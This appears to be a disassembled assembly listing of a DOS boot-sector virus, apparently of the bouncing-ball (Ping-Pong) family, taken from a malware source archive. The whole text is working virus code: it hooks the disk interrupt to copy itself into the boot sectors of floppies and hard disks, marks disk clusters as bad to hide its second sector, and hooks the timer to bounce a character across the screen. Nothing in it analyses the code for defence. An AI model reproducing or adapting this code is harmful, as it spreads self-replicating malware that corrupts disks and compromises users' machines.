mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 12:25:29 +00:00
4b9382ddbc
push
514 lines
8.9 KiB
NASM
514 lines
8.9 KiB
NASM
jmp short loc_3
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nop
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dec cx
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inc dx
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dec bp
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and [bx+si],ah
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xor bp,data_10
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add al,[si]
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data_14 dw 1
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add al,[bx+si]
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add bh,[bp+di]
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mov data_12,al
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add [bx+di],dl
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add [si],al
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add [bx+di],dl
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add [bp+di],dh
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loc_3:
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xor ax,ax
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mov ss,ax
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mov sp,7C00h
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mov ds,ax
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mov ax,data_5
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sub ax,2
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mov data_5,ax
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mov cl,6
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shl ax,cl ; Shift w/zeros fill
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sub ax,7C0h
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mov es,ax
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mov si,7C00h
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mov di,si
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mov cx,100h
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rep movsw ; Rep while cx>0 Mov [si] to es:[di]
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db 8Eh
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db 0C8h
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push cs
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pop ds
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call sub_1
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;==========================================================================
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; SUBROUTINE
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;==========================================================================
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sub_1 proc near
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xor ah,ah ; Zero register
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int 13h ; Disk dl=drive b: ah=func 00h
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; reset disk, al=return status
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and data_24,80h
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mov bx,data_25
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push cs
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pop ax
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sub ax,20h
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mov es,ax
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call sub_3
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mov bx,data_25
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inc bx
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mov ax,0FFC0h
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mov es,ax
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call sub_3
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xor ax,ax ; Zero register
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mov data_23,al
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mov ds,ax
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mov ax,data_3
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mov bx,data_4
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mov data_3,7CD0h
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mov data_4,cs
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push cs
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pop ds
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mov data_19,ax
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mov data_20,bx
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mov dl,data_24
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jmp far ptr loc_2
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sub_1 endp
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;==========================================================================
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; SUBROUTINE
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;==========================================================================
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sub_2 proc near
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mov ax,301h
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jmp short loc_4
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;==== External Entry into Subroutine ======================================
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sub_3:
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mov ax,201h
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loc_4:
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xchg ax,bx
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add ax,data_18
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xor dx,dx ; Zero register
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div data_16 ; ax,dxrem=dx:ax/data
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inc dl
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mov ch,dl
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xor dx,dx ; Zero register
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div data_17 ; ax,dxrem=dx:ax/data
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mov cl,6
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shl ah,cl ; Shift w/zeros fill
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or ah,ch
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mov cx,ax
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xchg ch,cl
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mov dh,dl
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mov ax,bx
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;==== External Entry into Subroutine ======================================
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sub_4:
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mov dl,data_24
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mov bx,8000h
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int 13h ; Disk dl=drive b: ah=func 02h
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; read sectors to memory es:bx
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jnc loc_ret_5 ; Jump if carry=0
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pop ax
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loc_ret_5:
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retn
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sub_2 endp
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push ds
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push es
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push ax
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push bx
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push cx
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push dx
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push cs
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pop ds
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push cs
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pop es
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test data_23,1
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jnz loc_8 ; Jump if not zero
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cmp ah,2
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jne loc_8 ; Jump if not equal
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cmp data_24,dl
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mov data_24,dl
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jnz loc_7 ; Jump if not zero
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xor ah,ah ; Zero register
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int 1Ah ; Real time clock ah=func 00h
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; get system timer count cx,dx
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test dh,7Fh
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jnz loc_6 ; Jump if not zero
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test dl,0F0h
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jnz loc_6 ; Jump if not zero
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push dx
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call sub_6
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pop dx
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loc_6:
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mov cx,dx
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sub dx,data_26
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mov data_26,cx
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sub dx,24h
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jc loc_8 ; Jump if carry Set
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loc_7:
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or data_23,1
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push si
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push di
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call sub_5
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pop di
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pop si
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and data_23,0FEh
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loc_8:
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pop dx
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pop cx
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pop bx
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pop ax
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pop es
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pop ds
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jmp far ptr loc_38
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;==========================================================================
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; SUBROUTINE
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;==========================================================================
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sub_5 proc near
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mov ax,201h
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mov dh,0
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mov cx,1
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call sub_4
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test data_24,80h
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jz loc_11 ; Jump if zero
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mov si,81BEh
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mov cx,4
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locloop_9:
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cmp data_8[si],1
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je loc_10 ; Jump if equal
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cmp data_8[si],4
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je loc_10 ; Jump if equal
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add si,10h
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loop locloop_9 ; Loop if cx > 0
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retn
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loc_10:
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mov dx,[si]
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mov cx,data_7[si]
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mov ax,201h
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call sub_4
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loc_11:
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mov si,8002h
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mov di,7C02h
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mov cx,1Ch
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rep movsb ; Rep while cx>0 Mov [si] to es:[di]
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cmp data_46,1357h
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jne loc_13 ; Jump if not equal
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cmp data_45,0
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jae loc_ret_12 ; Jump if above or =
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mov ax,data_43
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mov data_22,ax
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mov si,data_44
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jmp loc_23
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loc_ret_12:
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retn
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loc_13:
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cmp data_37,200h
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jne loc_ret_12 ; Jump if not equal
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cmp data_38,2
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jb loc_ret_12 ; Jump if below
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mov cx,data_39
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mov al,data_40
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cbw ; Convrt byte to word
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mul data_42 ; ax = data * ax
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add cx,ax
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mov ax,20h
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mul data_41 ; ax = data * ax
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add ax,1FFh
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mov bx,200h
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div bx ; ax,dx rem=dx:ax/reg
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add cx,ax
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mov data_22,cx
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mov ax,data_15
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sub ax,data_22
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mov bl,data_13
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xor dx,dx ; Zero register
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xor bh,bh ; Zero register
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div bx ; ax,dx rem=dx:ax/reg
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inc ax
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mov di,ax
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and data_23,0FBh
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cmp ax,0FF0h
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jbe loc_14 ; Jump if below or =
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or data_23,4
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loc_14:
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mov si,1
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mov bx,data_14
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dec bx
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mov data_21,bx
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mov data_27,0FEh
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jmp short loc_15
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data_21 dw 1Ah
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data_22 dw 73h
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data_23 db 4
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data_24 db 81h
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data_25 dw 654Bh
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add data_9[bx],dl
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push bp
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stosb ; Store al to es:[di]
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loc_15:
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inc data_21
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mov bx,data_21
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add data_27,2
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call sub_3
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jmp short loc_20
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loc_16:
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mov ax,3
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test data_23,4
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jz loc_17 ; Jump if zero
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inc ax
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loc_17:
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mul si ; dx:ax = reg * ax
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shr ax,1 ; Shift w/zeros fill
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sub ah,data_27
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mov bx,ax
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cmp bx,1FFh
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jae loc_15 ; Jump if above or =
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mov dx,data_36[bx]
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test data_23,4
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jnz loc_19 ; Jump if not zero
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mov cl,4
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test si,1
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jz loc_18 ; Jump if zero
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shr dx,cl ; Shift w/zeros fill
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loc_18:
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and dh,0Fh
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loc_19:
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test dx,0FFFFh
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jz loc_21 ; Jump if zero
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loc_20:
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inc si
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cmp si,di
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jbe loc_16 ; Jump if below or =
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retn
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loc_21:
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mov dx,0FFF7h
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test data_23,4
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jnz loc_22 ; Jump if not zero
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and dh,0Fh
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mov cl,4
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test si,1
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jz loc_22 ; Jump if zero
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shl dx,cl ; Shift w/zeros fill
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loc_22:
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or data_36[bx],dx
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mov bx,data_21
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call sub_2
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mov ax,si
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sub ax,2
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mov bl,data_13
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xor bh,bh ; Zero register
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mul bx ; dx:ax = reg * ax
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add ax,data_22
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mov si,ax
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mov bx,0
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call sub_3
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mov bx,si
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inc bx
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call sub_2
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loc_23:
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mov bx,si
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mov data_25,si
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push cs
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pop ax
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sub ax,20h
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mov es,ax
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call sub_2
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push cs
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pop ax
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sub ax,40h
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mov es,ax
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mov bx,0
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call sub_2
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retn
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sub_5 endp
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data_26 dw 246Eh
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data_27 db 32h
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;==========================================================================
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; SUBROUTINE
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;==========================================================================
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sub_6 proc near
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test data_23,2
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jnz loc_ret_24 ; Jump if not zero
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or data_23,2
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mov ax,0
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mov ds,ax
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mov ax,data_1
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mov bx,data_2
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mov data_1,7EDFh
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mov data_2,cs
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push cs
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pop ds
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mov data_28,ax
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mov data_29,bx
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loc_ret_24:
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retn
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sub_6 endp
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push ds
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push ax
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push bx
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push cx
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push dx
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push cs
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pop ds
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mov ah,0Fh
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int 10h ; Video display ah=functn 0Fh
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; get state, al=mode, bh=page
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mov bl,al
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cmp bx,data_34
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je loc_27 ; Jump if equal
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mov data_34,bx
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dec ah
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mov data_35,ah
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mov ah,1
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cmp bl,7
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jne loc_25 ; Jump if not equal
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dec ah
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loc_25:
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cmp bl,4
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jae loc_26 ; Jump if above or =
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dec ah
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loc_26:
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mov data_33,ah
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mov data_31,101h
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mov data_32,101h
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mov ah,3
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int 10h ; Video display ah=functn 03h
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; get cursor loc in dx, mode cx
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push dx
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mov dx,data_31
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jmp short loc_29
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loc_27:
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mov ah,3
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int 10h ; Video display ah=functn 03h
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; get cursor loc in dx, mode cx
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push dx
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mov ah,2
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mov dx,data_31
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int 10h ; Video display ah=functn 02h
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; set cursor location in dx
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mov ax,data_30
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cmp data_33,1
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jne loc_28 ; Jump if not equal
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mov ax,8307h
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loc_28:
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mov bl,ah
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mov cx,1
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mov ah,9
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int 10h ; Video display ah=functn 09h
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; set char al & attrib ah @curs
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loc_29:
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mov cx,data_32
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cmp dh,0
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jne loc_30 ; Jump if not equal
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xor ch,0FFh
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inc ch
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loc_30:
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cmp dh,18h
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jne loc_31 ; Jump if not equal
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xor ch,0FFh
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inc ch
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loc_31:
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cmp dl,0
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jne loc_32 ; Jump if not equal
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xor cl,0FFh
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inc cl
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loc_32:
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cmp dl,data_35
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jne loc_33 ; Jump if not equal
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xor cl,0FFh
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inc cl
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loc_33:
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cmp cx,data_32
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jne loc_35 ; Jump if not equal
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mov ax,data_30
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and al,7
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cmp al,3
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jne loc_34 ; Jump if not equal
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xor ch,0FFh
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inc ch
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loc_34:
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cmp al,5
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jne loc_35 ; Jump if not equal
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xor cl,0FFh
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inc cl
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loc_35:
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add dl,cl
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add dh,ch
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mov data_32,cx
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mov data_31,dx
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mov ah,2
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int 10h ; Video display ah=functn 02h
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; set cursor location in dx
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mov ah,8
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int 10h ; Video display ah=functn 08h
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; get char al & attrib ah @curs
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mov data_30,ax
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mov bl,ah
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cmp data_33,1
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jne loc_36 ; Jump if not equal
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mov bl,83h
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loc_36:
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mov cx,1
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mov ax,907h
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int 10h ; Video display ah=functn 09h
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; set char al & attrib ah @curs
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pop dx
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mov ah,2
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int 10h ; Video display ah=functn 02h
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; set cursor location in dx
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pop dx
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pop cx
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pop bx
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pop ax
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pop ds
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jmp far ptr loc_1
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data_30 dw 0
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data_31 dw 101h
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data_32 dw 101h
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data_33 db 0
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data_34 dw 0FFFFh
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data_35 db 50h
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mov bh,0B7h
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mov bh,0B6h
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inc ax
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inc ax
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mov dh,bl
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out 5Ah,al ; port 5Ah
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lodsb ; String [si] to al
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shl ah,cl ; Shift w/zeros fill
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jmp far ptr loc_39
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inc ax
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db 64h
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pop sp
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db 60h
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push dx
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inc ax
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inc ax
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inc ax
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inc ax
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db 64h
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db 62h
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pop si
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db 62h
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db 60h
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pop si
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jo loc_37 ; Jump if overflow=1
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inc ax
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inc cx
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mov bh,0B7h
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mov bh,0B6h
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